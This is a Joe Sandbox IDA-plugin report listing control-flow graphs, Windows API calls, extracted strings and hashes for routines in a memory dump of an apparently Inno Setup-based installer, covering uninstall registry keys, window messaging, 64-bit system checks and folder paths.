                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: NameUser
                                                                              • String ID:
                                                                              • API String ID: 2645101109-0
                                                                              • Opcode ID: 969018677e36c7ee3cac7a31a88a81c68082f6a067fe28717e4d5eb0c099a74a
                                                                              • Instruction ID: 9f318ec9847dd9a6abcb639c8bc611599857aea0b867fcad4bfaeec6bdb042bf
                                                                              • Opcode Fuzzy Hash: 969018677e36c7ee3cac7a31a88a81c68082f6a067fe28717e4d5eb0c099a74a
                                                                              • Instruction Fuzzy Hash: 8FD0C27230470473CB00AA689C825AA35CD8B84305F00483E3CC5DA2C3FABDDA485756
                                                                              APIs
                                                                              • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0042F53C
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: NtdllProc_Window
                                                                              • String ID:
                                                                              • API String ID: 4255912815-0
                                                                              • Opcode ID: 9e43cbcd657a147b44e82c26281af1c584f356d37a2e763e4ec43db1fd6d4cd6
                                                                              • Instruction ID: 7ca9c19e24a5def9c493c34941f9da96f9ca037215ec7a65a90973bf7a04e639
                                                                              • Opcode Fuzzy Hash: 9e43cbcd657a147b44e82c26281af1c584f356d37a2e763e4ec43db1fd6d4cd6
                                                                              • Instruction Fuzzy Hash: FCD09E7120011D7B9B00DE99E840D6B33AD9B88710B909925F945D7642D634ED9197A5

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 844 46eecc-46eefe 845 46ef00-46ef07 844->845 846 46ef1b 844->846 847 46ef12-46ef19 845->847 848 46ef09-46ef10 845->848 849 46ef22-46ef5a call 403634 call 403738 call 42dec0 846->849 847->849 848->846 848->847 856 46ef75-46ef9e call 403738 call 42dde4 849->856 857 46ef5c-46ef70 call 403738 call 42dec0 849->857 865 46efa0-46efa9 call 46eb9c 856->865 866 46efae-46efd7 call 46ecb8 856->866 857->856 865->866 870 46efe9-46efec call 403400 866->870 871 46efd9-46efe7 call 403494 866->871 874 46eff1-46f03c call 46ecb8 call 42c3fc call 46ed00 call 46ecb8 870->874 871->874 884 46f052-46f073 call 45559c call 46ecb8 874->884 885 46f03e-46f051 call 46ed28 874->885 892 46f075-46f0c8 call 46ecb8 call 431404 call 46ecb8 call 431404 call 46ecb8 884->892 893 46f0c9-46f0d0 884->893 885->884 892->893 895 46f0d2-46f10f call 431404 call 46ecb8 call 431404 call 46ecb8 893->895 896 46f110-46f117 893->896 895->896 899 46f158-46f17d call 40b24c call 46ecb8 896->899 900 46f119-46f157 call 46ecb8 * 3 896->900 918 46f17f-46f18a call 47bd90 899->918 919 46f18c-46f195 call 403494 899->919 900->899 929 46f19a-46f1a5 call 478924 918->929 919->929 934 46f1a7-46f1ac 929->934 935 46f1ae 929->935 936 46f1b3-46f37d call 403778 call 46ecb8 call 47bd90 call 46ed00 call 403494 call 40357c * 2 call 46ecb8 call 403494 call 40357c * 2 call 46ecb8 call 47bd90 call 46ed00 call 47bd90 call 46ed00 call 47bd90 call 46ed00 call 47bd90 call 46ed00 call 47bd90 call 46ed00 call 47bd90 call 46ed00 call 47bd90 call 46ed00 call 47bd90 call 46ed00 call 47bd90 call 46ed00 call 47bd90 934->936 935->936 999 46f393-46f3a1 call 46ed28 936->999 1000 46f37f-46f391 call 46ecb8 936->1000 1004 46f3a6 999->1004 1005 46f3a7-46f3f0 call 46ed28 call 46ed5c call 46ecb8 call 47bd90 call 46edc0 1000->1005 1004->1005 1016 46f416-46f423 1005->1016 1017 46f3f2-46f415 call 46ed28 * 2 1005->1017 1019 46f4f2-46f4f9 1016->1019 1020 46f429-46f430 1016->1020 1017->1016 1024 46f553-46f569 RegCloseKey 1019->1024 1025 46f4fb-46f531 call 49485c 1019->1025 1022 46f432-46f439 1020->1022 1023 46f49d-46f4ac 1020->1023 1022->1023 1028 46f43b-46f45f call 430bcc 1022->1028 1027 46f4af-46f4bc 1023->1027 1025->1024 1032 46f4d3-46f4ec call 430c08 call 46ed28 1027->1032 1033 46f4be-46f4cb 1027->1033 1028->1027 1039 46f461-46f462 1028->1039 1042 46f4f1 1032->1042 1033->1032 1035 46f4cd-46f4d1 1033->1035 1035->1019 1035->1032 1041 46f464-46f48a call 40b24c call 479150 1039->1041 1047 46f497-46f499 1041->1047 1048 46f48c-46f492 call 430bcc 1041->1048 1042->1019 1047->1041 1050 46f49b 1047->1050 1048->1047 1050->1027
                                                                              APIs
                                                                                • Part of subcall function 0046ECB8: RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,00475FFE,?,0049C1DC,?,0046EFCF,?,00000000,0046F56A,?,_is1), ref: 0046ECDB
                                                                                • Part of subcall function 0046ED28: RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F3A6,?,?,00000000,0046F56A,?,_is1,?), ref: 0046ED3B
                                                                              • RegCloseKey.ADVAPI32(?,0046F571,?,_is1,?,Software\Microsoft\Windows\CurrentVersion\Uninstall\,00000000,0046F5BC,?,?,0049C1DC,00000000), ref: 0046F564
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Value$Close
                                                                              • String ID: " /SILENT$5.5.2 (a)$Comments$Contact$DisplayIcon$DisplayName$DisplayVersion$EstimatedSize$HelpLink$HelpTelephone$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: Language$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: Setup Version$Inno Setup: User$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$InstallDate$InstallLocation$MajorVersion$MinorVersion$ModifyPath$NoModify$NoRepair$Publisher$QuietUninstallString$Readme$RegisterPreviousData$Software\Microsoft\Windows\CurrentVersion\Uninstall\$URLInfoAbout$URLUpdateInfo$UninstallString$_is1
                                                                              • API String ID: 3391052094-2734025597
                                                                              • Opcode ID: 4b47327b70ee27fc59f023ce9095d4925cbd7ad973a1f437070c8b1580be5bb7
                                                                              • Instruction ID: 41df9594f94a3a106a445eb875b77748a5d5020e54387338891d7450c5044d2a
                                                                              • Opcode Fuzzy Hash: 4b47327b70ee27fc59f023ce9095d4925cbd7ad973a1f437070c8b1580be5bb7
                                                                              • Instruction Fuzzy Hash: CF123335A00109AFDB04EF55E981ADE73F5EB48304F60847BE840AB396EB78AD45CB5D

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1051 4923a8-4923dc call 403684 1054 4923de-4923ed call 446f9c Sleep 1051->1054 1055 4923f2-4923ff call 403684 1051->1055 1060 492882-49289c call 403420 1054->1060 1061 49242e-49243b call 403684 1055->1061 1062 492401-492424 call 446ff8 call 403738 FindWindowA call 447278 1055->1062 1070 49246a-492477 call 403684 1061->1070 1071 49243d-492465 call 446ff8 call 403738 FindWindowA call 447278 1061->1071 1081 492429 1062->1081 1079 492479-4924bb call 446f9c * 4 SendMessageA call 447278 1070->1079 1080 4924c0-4924cd call 403684 1070->1080 1071->1060 1079->1060 1089 49251c-492529 call 403684 1080->1089 1090 4924cf-492517 call 446f9c * 4 PostMessageA call 4470d0 1080->1090 1081->1060 1098 492578-492585 call 403684 1089->1098 1099 49252b-492573 call 446f9c * 4 SendNotifyMessageA call 4470d0 1089->1099 1090->1060 1111 4925b2-4925bf call 403684 1098->1111 1112 492587-4925ad call 446ff8 call 403738 RegisterClipboardFormatA call 447278 1098->1112 1099->1060 1127 4925c1-4925fb call 446f9c * 3 SendMessageA call 447278 1111->1127 1128 492600-49260d call 403684 1111->1128 1112->1060 1127->1060 1140 49260f-49264f call 446f9c * 3 PostMessageA call 4470d0 1128->1140 1141 492654-492661 call 403684 1128->1141 1140->1060 1151 4926a8-4926b5 call 403684 1141->1151 1152 492663-4926a3 call 446f9c * 3 SendNotifyMessageA call 4470d0 1141->1152 1162 49270a-492717 call 403684 1151->1162 1163 4926b7-4926d5 call 446ff8 call 42e394 1151->1163 1152->1060 1174 492719-492745 call 446ff8 call 403738 call 446f9c GetProcAddress 1162->1174 1175 492791-49279e call 403684 1162->1175 1183 4926e7-4926f5 GetLastError call 447278 1163->1183 1184 4926d7-4926e5 call 447278 1163->1184 1208 492781-49278c call 4470d0 1174->1208 1209 492747-49277c call 446f9c * 2 call 447278 call 4470d0 1174->1209 1189 4927a0-4927c1 call 446f9c FreeLibrary call 4470d0 1175->1189 1190 4927c6-4927d3 call 403684 1175->1190 1195 4926fa-492705 call 447278 1183->1195 1184->1195 1189->1060 1201 4927f8-492805 call 403684 1190->1201 1202 4927d5-4927f3 call 446ff8 call 403738 CreateMutexA 1190->1202 1195->1060 1217 49283b-492848 call 403684 1201->1217 1218 492807-492839 call 48c764 call 403574 call 403738 OemToCharBuffA call 48c77c 1201->1218 1202->1060 1208->1060 1209->1060 1227 49284a-49287c call 48c764 call 403574 call 403738 CharToOemBuffA call 48c77c 1217->1227 1228 49287e 1217->1228 1218->1060 1227->1060 1228->1060
                                                                              APIs
                                                                              • Sleep.KERNEL32(00000000,00000000,0049289D,?,?,?,?,00000000,00000000,00000000), ref: 004923E8
                                                                              • FindWindowA.USER32(00000000,00000000), ref: 00492419
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: FindSleepWindow
                                                                              • String ID: CALLDLLPROC$CHARTOOEMBUFF$CREATEMUTEX$FINDWINDOWBYCLASSNAME$FINDWINDOWBYWINDOWNAME$FREEDLL$LOADDLL$OEMTOCHARBUFF$POSTBROADCASTMESSAGE$POSTMESSAGE$REGISTERWINDOWMESSAGE$SENDBROADCASTMESSAGE$SENDBROADCASTNOTIFYMESSAGE$SENDMESSAGE$SENDNOTIFYMESSAGE$SLEEP
                                                                              • API String ID: 3078808852-3310373309
                                                                              • Opcode ID: fc65408302e00bfaa9df3cfa690acb5bb30b22ebaabf7b5c0919dab2d319a526
                                                                              • Instruction ID: 9f3505894e5a6fd9d1366d4270c7319e33b1617852d99992837f934410b553a1
                                                                              • Opcode Fuzzy Hash: fc65408302e00bfaa9df3cfa690acb5bb30b22ebaabf7b5c0919dab2d319a526
                                                                              • Instruction Fuzzy Hash: 0CC182A0B042413BDB14FF3E9D4151F59A99B94708B118A3FB446EB38BCE7DED0A4399

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1621 483560-483585 GetModuleHandleA GetProcAddress 1622 4835ec-4835f1 GetSystemInfo 1621->1622 1623 483587-48359d GetNativeSystemInfo GetProcAddress 1621->1623 1625 4835f6-4835ff 1622->1625 1624 48359f-4835aa GetCurrentProcess 1623->1624 1623->1625 1624->1625 1632 4835ac-4835b0 1624->1632 1626 48360f-483616 1625->1626 1627 483601-483605 1625->1627 1628 483631-483636 1626->1628 1630 483618-48361f 1627->1630 1631 483607-48360b 1627->1631 1630->1628 1633 48360d-48362a 1631->1633 1634 483621-483628 1631->1634 1632->1625 1636 4835b2-4835b9 call 45271c 1632->1636 1633->1628 1634->1628 1636->1625 1639 4835bb-4835c8 GetProcAddress 1636->1639 1639->1625 1640 4835ca-4835e1 GetModuleHandleA GetProcAddress 1639->1640 1640->1625 1641 4835e3-4835ea 1640->1641 1641->1625
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00483571
                                                                              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0048357E
                                                                              • GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 0048358C
                                                                              • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00483594
                                                                              • GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 004835A0
                                                                              • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 004835C1
                                                                              • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 004835D4
                                                                              • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 004835DA
                                                                              • GetSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 004835F1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$HandleInfoModuleSystem$CurrentNativeProcess
                                                                              • String ID: GetNativeSystemInfo$GetSystemWow64DirectoryA$IsWow64Process$RegDeleteKeyExA$advapi32.dll$kernel32.dll
                                                                              • API String ID: 2230631259-2623177817
                                                                              • Opcode ID: ecd875b9fed982c6964d0a5895b6aed5fdd9f377785afaacdd435e2d250d9586
                                                                              • Instruction ID: 55e3f4d73e57614863bf74929b0f0177a2d28665cd9645ad6096ae2f13a54172
                                                                              • Opcode Fuzzy Hash: ecd875b9fed982c6964d0a5895b6aed5fdd9f377785afaacdd435e2d250d9586
                                                                              • Instruction Fuzzy Hash: D6113D81549782B4DA21BB7D8D5AB6F1A888B10F5AF140C3B7C40753C2E96DCE458B6E

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1647 468bfc-468c34 call 47bd90 1650 468e16-468e30 call 403420 1647->1650 1651 468c3a-468c4a call 478944 1647->1651 1656 468c4f-468c94 call 4078f4 call 403738 call 42de1c 1651->1656 1662 468c99-468c9b 1656->1662 1663 468ca1-468cb6 1662->1663 1664 468e0c-468e10 1662->1664 1665 468ccb-468cd2 1663->1665 1666 468cb8-468cc6 call 42dd4c 1663->1666 1664->1650 1664->1656 1668 468cd4-468cf6 call 42dd4c call 42dd64 1665->1668 1669 468cff-468d06 1665->1669 1666->1665 1668->1669 1690 468cf8 1668->1690 1670 468d5f-468d66 1669->1670 1671 468d08-468d2d call 42dd4c * 2 1669->1671 1675 468dac-468db3 1670->1675 1676 468d68-468d7a call 42dd4c 1670->1676 1693 468d2f-468d38 call 4314f8 1671->1693 1694 468d3d-468d4f call 42dd4c 1671->1694 1678 468db5-468de9 call 42dd4c * 3 1675->1678 1679 468dee-468e04 RegCloseKey 1675->1679 1686 468d7c-468d85 call 4314f8 1676->1686 1687 468d8a-468d9c call 42dd4c 1676->1687 1678->1679 1686->1687 1687->1675 1700 468d9e-468da7 call 4314f8 1687->1700 1690->1669 1693->1694 1694->1670 1704 468d51-468d5a call 4314f8 1694->1704 1700->1675 1704->1670
                                                                              APIs
                                                                                • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004836C7,?,00000001,?,?,004836C7,?,00000001,00000000), ref: 0042DE38
                                                                              • RegCloseKey.ADVAPI32(?,00468E16,?,?,00000001,00000000,00000000,00468E31,?,00000000,00000000,?), ref: 00468DFF
                                                                              Strings
                                                                              • Inno Setup: User Info: Organization, xrefs: 00468DCE
                                                                              • Inno Setup: Icon Group, xrefs: 00468CDA
                                                                              • Inno Setup: Deselected Components, xrefs: 00468D40
                                                                              • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00468C5B
                                                                              • Inno Setup: Deselected Tasks, xrefs: 00468D8D
                                                                              • Inno Setup: User Info: Name, xrefs: 00468DBB
                                                                              • Inno Setup: No Icons, xrefs: 00468CE7
                                                                              • Inno Setup: User Info: Serial, xrefs: 00468DE1
                                                                              • %s\%s_is1, xrefs: 00468C79
                                                                              • Inno Setup: Setup Type, xrefs: 00468D0E
                                                                              • Inno Setup: Selected Components, xrefs: 00468D1E
                                                                              • Inno Setup: App Path, xrefs: 00468CBE
                                                                              • Inno Setup: Selected Tasks, xrefs: 00468D6B
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: CloseOpen
                                                                              • String ID: %s\%s_is1$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                              • API String ID: 47109696-1093091907
                                                                              • Opcode ID: 477994bb8960d1965e10b40f61816eaf4c7b707db17a7ca4aa6169c09ca9eb9e
                                                                              • Instruction ID: 0c37994fccd001a995e494b6850b37eb05b7d5ed784e69181523ebf3a7e49158
                                                                              • Opcode Fuzzy Hash: 477994bb8960d1965e10b40f61816eaf4c7b707db17a7ca4aa6169c09ca9eb9e
                                                                              • Instruction Fuzzy Hash: 8D51C570A006049BCB10DB65C941BDEB7F5EF48304F50856EE840AB391EB38AF01CB6D

                                                                              Control-flow Graph

                                                                              APIs
                                                                                • Part of subcall function 0042D898: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00453DB4,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,00497F15), ref: 0042D8AB
                                                                                • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                • Part of subcall function 0042D8F0: GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00453B5A,00000000,00453BFD,?,?,00000000,00000000,00000000,00000000,00000000,?,00453FED,00000000), ref: 0042D90A
                                                                                • Part of subcall function 0042D8F0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D910
                                                                              • SHGetKnownFolderPath.SHELL32(00499D1C,00008000,00000000,?,00000000,0047C432), ref: 0047C336
                                                                              • CoTaskMemFree.OLE32(?,0047C37B), ref: 0047C36E
                                                                                • Part of subcall function 0042D208: GetEnvironmentVariableA.KERNEL32(00000000,00000000,00000000,?,?,00000000,0042DA3E,00000000,0042DAD0,?,?,?,0049B628,00000000,00000000), ref: 0042D233
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Directory$AddressEnvironmentFolderFreeHandleKnownModulePathProcSystemTaskVariableWindows
                                                                              • String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
                                                                              • API String ID: 3771764029-544719455
                                                                              • Opcode ID: 458afd9a1cda60bc5c06d2a3f17cd4b8a975594a1455dcf27ea3d462b6d04529
                                                                              • Instruction ID: 599f5abe96f02a195e24b8b9203061af68f55c26e596fa95a84979d127ba116b
                                                                              • Opcode Fuzzy Hash: 458afd9a1cda60bc5c06d2a3f17cd4b8a975594a1455dcf27ea3d462b6d04529
                                                                              • Instruction Fuzzy Hash: 84619134A00204ABDB10EBA5E8D2A9E7B65EB54308F90C57FE804A7396C73C9E44CF5D

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1949 423874-42387e 1950 4239a7-4239ab 1949->1950 1951 423884-4238a6 call 41f3c4 GetClassInfoA 1949->1951 1954 4238d7-4238e0 GetSystemMetrics 1951->1954 1955 4238a8-4238bf RegisterClassA 1951->1955 1956 4238e2 1954->1956 1957 4238e5-4238ef GetSystemMetrics 1954->1957 1955->1954 1958 4238c1-4238d2 call 408cbc call 40311c 1955->1958 1956->1957 1960 4238f1 1957->1960 1961 4238f4-423950 call 403738 call 4062e8 call 403400 call 42364c SetWindowLongA 1957->1961 1958->1954 1960->1961 1972 423952-423965 call 424178 SendMessageA 1961->1972 1973 42396a-423998 GetSystemMenu DeleteMenu * 2 1961->1973 1972->1973 1973->1950 1975 42399a-4239a2 DeleteMenu 1973->1975 1975->1950
                                                                              APIs
                                                                                • Part of subcall function 0041F3C4: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDA4,?,0042388F,00423C0C,0041EDA4), ref: 0041F3E2
                                                                              • GetClassInfoA.USER32(00400000,0042367C), ref: 0042389F
                                                                              • RegisterClassA.USER32(00499630), ref: 004238B7
                                                                              • GetSystemMetrics.USER32(00000000), ref: 004238D9
                                                                              • GetSystemMetrics.USER32(00000001), ref: 004238E8
                                                                              • SetWindowLongA.USER32(00410460,000000FC,0042368C), ref: 00423944
                                                                              • SendMessageA.USER32(00410460,00000080,00000001,00000000), ref: 00423965
                                                                              • GetSystemMenu.USER32(00410460,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C,0041EDA4), ref: 00423970
                                                                              • DeleteMenu.USER32(00000000,0000F030,00000000,00410460,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C,0041EDA4), ref: 0042397F
                                                                              • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,00410460,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001), ref: 0042398C
                                                                              • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,00410460,00000000,00000000,00400000,00000000,00000000,00000000), ref: 004239A2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873897144.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873913689.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_imMQqf6YWk.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$DeleteSystem$ClassMetrics$AllocInfoLongMessageRegisterSendVirtualWindow
                                                                              • String ID: |6B
                                                                              • API String ID: 183575631-3009739247
                                                                              • Opcode ID: 0318a091630d13b60d0a3e6aa49d41dd0f32c1053a4a49f7651c07b17dd5309d
                                                                              • Instruction ID: 5979ac727d64f3fe5c9a0a43452729076f54e0f9e4c251b9a4c28f9d6bed272f
                                                                              • Opcode Fuzzy Hash: 0318a091630d13b60d0a3e6aa49d41dd0f32c1053a4a49f7651c07b17dd5309d
                                                                              • Instruction Fuzzy Hash: E63152B17402006AEB10AF69DC82F6A37989B14709F60017BFA44EF2D7C6BDED40876D

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1977 47c968-47c9be call 42c3fc call 4035c0 call 47c62c call 4525d8 1986 47c9c0-47c9c5 call 453344 1977->1986 1987 47c9ca-47c9d9 call 4525d8 1977->1987 1986->1987 1991 47c9f3-47c9f9 1987->1991 1992 47c9db-47c9e1 1987->1992 1995 47ca10-47ca38 call 42e394 * 2 1991->1995 1996 47c9fb-47ca01 1991->1996 1993 47ca03-47ca0b call 403494 1992->1993 1994 47c9e3-47c9e9 1992->1994 1993->1995 1994->1991 1997 47c9eb-47c9f1 1994->1997 2003 47ca5f-47ca79 GetProcAddress 1995->2003 2004 47ca3a-47ca5a call 4078f4 call 453344 1995->2004 1996->1993 1996->1995 1997->1991 1997->1993 2005 47ca85-47caa2 call 403400 * 2 2003->2005 2006 47ca7b-47ca80 call 453344 2003->2006 2004->2003 2006->2005
                                                                              APIs
                                                                              • GetProcAddress.KERNEL32(74610000,SHGetFolderPathA), ref: 0047CA6A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.3873803810.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.3873783141.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873866815.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.3873881589.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
